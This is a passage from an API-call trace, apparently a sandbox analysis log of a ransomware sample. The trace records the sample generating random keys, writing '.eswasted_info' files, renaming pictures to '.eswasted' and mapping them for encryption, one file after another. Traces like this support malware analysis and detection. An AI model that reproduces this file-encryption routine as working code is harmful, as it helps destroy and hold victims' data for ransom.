hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0080.041] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KTDqRNhC.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ktdqrnhc.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.041] WriteFile (in: hFile=0x130, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.043] SetEndOfFile (hFile=0x130) returned 1 [0080.043] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0080.043] lstrcpyW (in: lpString1=0x6f5d2e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.043] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KTDqRNhC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ktdqrnhc.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KTDqRNhC.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ktdqrnhc.gif.eswasted")) returned 1 [0080.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KTDqRNhC.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ktdqrnhc.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0080.044] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.047] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.048] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.048] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.048] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.049] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.049] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.059] SetEndOfFile (hFile=0x130) returned 1 [0080.061] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0080.061] CloseHandle (hObject=0x130) returned 1 [0080.063] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0080.063] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.064] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.065] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\K_CeXvPw6H96ZASs.bmp") returned 63 [0080.065] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x288) returned 0x6f5cc0 [0080.065] lstrcpyW (in: lpString1=0x6f5d3e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.065] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0080.065] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.066] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0080.066] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\K_CeXvPw6H96ZASs.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k_cexvpw6h96zass.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.074] WriteFile (in: hFile=0x108, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.111] SetEndOfFile (hFile=0x108) returned 1 [0080.111] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.111] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0080.111] lstrcpyW (in: lpString1=0x6f5d3e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.112] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\K_CeXvPw6H96ZASs.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k_cexvpw6h96zass.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\K_CeXvPw6H96ZASs.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k_cexvpw6h96zass.bmp.eswasted")) returned 1 [0080.141] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\K_CeXvPw6H96ZASs.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\k_cexvpw6h96zass.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.141] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0080.144] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.145] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.145] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.145] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.146] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.146] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.155] SetEndOfFile (hFile=0x108) returned 1 [0080.188] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0080.188] CloseHandle (hObject=0x108) returned 1 [0080.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0080.190] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.191] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.191] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.191] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nHbj3SkaGPHQFi.gif") returned 61 [0080.191] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x284) returned 0x6f5cc0 [0080.191] lstrcpyW (in: lpString1=0x6f5d3a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.191] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.191] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.192] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.192] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.192] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nHbj3SkaGPHQFi.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nhbj3skagphqfi.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.193] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.194] SetEndOfFile (hFile=0x108) returned 1 [0080.194] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.194] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.194] lstrcpyW (in: lpString1=0x6f5d3a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nHbj3SkaGPHQFi.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nhbj3skagphqfi.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nHbj3SkaGPHQFi.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nhbj3skagphqfi.gif.eswasted")) returned 1 [0080.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nHbj3SkaGPHQFi.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nhbj3skagphqfi.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0080.195] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0080.197] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.198] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.198] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.198] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.198] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.198] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.207] SetEndOfFile (hFile=0x108) returned 1 [0080.209] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.210] CloseHandle (hObject=0x108) returned 1 [0080.217] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0080.217] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.218] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.218] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.218] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o O4bNIxg04.gif") returned 58 [0080.218] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27e) returned 0x6f5cc0 [0080.218] lstrcpyW (in: lpString1=0x6f5d34, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.218] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.218] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.219] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.219] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o O4bNIxg04.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o o4bnixg04.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.220] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.221] SetEndOfFile (hFile=0x108) returned 1 [0080.221] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.221] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.221] lstrcpyW (in: lpString1=0x6f5d34, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.221] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o O4bNIxg04.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o o4bnixg04.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o O4bNIxg04.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o o4bnixg04.gif.eswasted")) returned 1 [0080.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\o O4bNIxg04.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\o o4bnixg04.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0080.223] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.226] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.226] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.226] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.226] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.227] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.227] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.236] SetEndOfFile (hFile=0x108) returned 1 [0080.238] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.238] CloseHandle (hObject=0x108) returned 1 [0080.240] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0080.240] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.241] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.241] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ofv tsXj3S.jpg") returned 57 [0080.241] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x6f5cc0 [0080.241] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.241] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.241] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.242] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.242] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ofv tsXj3S.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ofv tsxj3s.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.242] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.243] SetEndOfFile (hFile=0x108) returned 1 [0080.243] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.243] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.244] lstrcpyW (in: lpString1=0x6f5d32, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.244] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ofv tsXj3S.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ofv tsxj3s.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ofv tsXj3S.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ofv tsxj3s.jpg.eswasted")) returned 1 [0080.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Ofv tsXj3S.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ofv tsxj3s.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.244] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0080.246] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.246] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.246] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.247] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.247] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.247] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.256] SetEndOfFile (hFile=0x108) returned 1 [0080.258] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.258] CloseHandle (hObject=0x108) returned 1 [0080.259] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0080.259] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.260] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.260] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.260] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pJniJdhO-P8PoBhrPUOw.bmp") returned 67 [0080.260] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x290) returned 0x6f5cc0 [0080.260] lstrcpyW (in: lpString1=0x6f5d46, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.260] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.260] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.261] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.261] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pJniJdhO-P8PoBhrPUOw.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pjnijdho-p8pobhrpuow.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.263] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.264] SetEndOfFile (hFile=0x108) returned 1 [0080.264] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.264] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.264] lstrcpyW (in: lpString1=0x6f5d46, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pJniJdhO-P8PoBhrPUOw.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pjnijdho-p8pobhrpuow.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pJniJdhO-P8PoBhrPUOw.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pjnijdho-p8pobhrpuow.bmp.eswasted")) returned 1 [0080.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pJniJdhO-P8PoBhrPUOw.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pjnijdho-p8pobhrpuow.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0080.265] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.266] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.266] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.266] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.267] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.267] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.267] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.276] SetEndOfFile (hFile=0x108) returned 1 [0080.278] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.278] CloseHandle (hObject=0x108) returned 1 [0080.279] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0080.279] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.280] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.280] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.280] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PJQGu6K.bmp") returned 54 [0080.280] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x276) returned 0x6f5cc0 [0080.280] lstrcpyW (in: lpString1=0x6f5d2c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.280] 